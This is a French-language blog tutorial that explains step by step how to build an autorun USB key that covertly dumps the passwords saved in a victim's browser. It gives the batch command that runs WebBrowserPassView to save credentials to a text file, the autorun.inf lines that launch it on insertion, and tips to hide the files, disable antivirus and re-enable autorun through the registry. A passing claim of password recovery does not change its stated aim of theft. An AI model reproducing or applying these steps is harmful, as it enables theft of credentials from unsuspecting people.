TUTO | Création d'un USB Rootkit pour récupérer des mots de passe

Bonjour les devs 🙌, ici Galsen DEV pour vous servir !
Bon avant de commencer j'aimerais d'abord m'excuser 🙏 car vous avez été nombreux à me dire que je n'étais pas assez actif sur le blog...
Et vous avez raison car, avec les cours, les projets et quelques soucis techniques, le temps ne suit pas du tout !
Mais ne vous inquiétez pas je serais maintenant plus actifs sur les publications, je vous prépare beaucoup de trucs 😉.


INTRODUCTION
Comme vous l'avez vu, aujourd’hui nous allons voir comment créer une clé USB qui récupère les mots de passe enregistrés sur un navigateur (Facebook, Twitter, Gmail, Instagram....).
Cette clé USB s’exécute automatiquement et récupère la plupart des mots de passe stocker sur le navigateur de la victime.
Il peut être aussi vraiment utile surtout quand on a perdu ou oublié ses mots de passe.


PRÉREQUIS
• Avoir une clé USB en bon état et de préférence d'une capacité entre 1 & 4 giga.
• Avoir quelques notions en programmation Batch (Cmd).

Nous allons travailler en 3 étapes dans ce tutoriel, veuillez suivre méticuleusement toutes les étapes sur lesquelles nous allons travailler.
Vous pouvez aussi suivre le vidéo faite pour l'occasion après et pour ceux qui sont paresseux à la lecture vous pouvez aller directement la regarder.


ETAPE 01 : Le téléchargement
Pour récupérer les mots de passe nous aurons besoin d'un petit logiciel: WebBrowserPassView.exe
Disponible sur ce LIEN
Une fois que vous l'aurez téléchargé, vous pouvez insérer votre clé USB sur la machine.
Ensuite copier le logiciel téléchargé sur la clé.


ETAPE 02 : Le fichier Batch
Maintenant nous allons créer un script en Batch qui va permettre d'exécuter notre logiciel afin de voler les identifiants et mots de passe et va stocker les données dans un fichier texte.
1/ Créer un nouveau fichier via Notepad (ou un autre éditeur) et enregistrer le fichier que vous venez de créer sous l'extension .bat (très important)
2/ Ecriver les lignes de commande suivante dans le fichier Batch que vous venez de créer :
- @echo off
- start WebBrowserPassView.exe /stext password.txt
Explication du script :
start WebBrowserPassView.exe : va lancer le logiciel qui va récupérer nos mots de passe
/stext password.txt : va enregistrer tout ce qu'il va trouver dans un fichier texte nommer "password txt"
3/ Une fois finit vous pouvez sauvegarder et fermer le fichier.


ETAPE 03 : L'autorun
Un fichier autorun permet d’automatiser le lancement de certains programmes lors de l’insertion d’un périphérique de stockage (CD, Clé USB, etc.), bref c'est l'autorun qui va nous permettre d'exécuter directement la clé dès son insertion.
Maintenant nous allons créer le fichier autorun.
1/ Créer un nouveau fichier via Notepad où tout autre éditeur et enregistrer le fichier que vous venez de créer sous l'extension .inf (très important aussi)
2/ Ecriver les lignes de commande suivante dans le fichier que vous venez de créer :
- [autorun]
- open=nom_du_fichier.bat
Explication du script :
[autorun] : syntaxe obligatoire pour créer un autorun
open=nom_du_fichier.bat : va permettre dès que la clé est insérée de lancer immédiatement le fichier batch qui contient le script qui vole les données (surtout ne pas oubliez l'extension .bat)
3/ Une fois finit vous pouvez sauvegarder et fermer le fichier.

C'est fini !
Votre clé USB Rootkit est maintenant prête
Il ne vous reste plus qu’à la tester sur votre machine.

BONUS :
• Pour ne pas être grillé vous pouvez cacher tous les fichiers sur la clé.

Problèmes possibles :
1/ des fois les antivirus signalent l'autorun comme un virus donc penser à désactiver votre antivirus, si vous voulez le tester.
2/ Sur certain ordinateur l’autorun est désactivé.
Pour activer l’autorun, aller dans Exécuter (Windows+R) puis taper regedit.exe
Dans l’arborescence de la base de registres aller dans : HKEY_LOCAL_MACHINE /SOFTWARE /Microsoft /Windows /CurrentVersion modifier la clé suivante, avec la valeur 91 « NoDriveTypeAutoRun»=dword: 00000091 puis redémarre le PC.


On se retrouve très vite pour un autre tuto 😁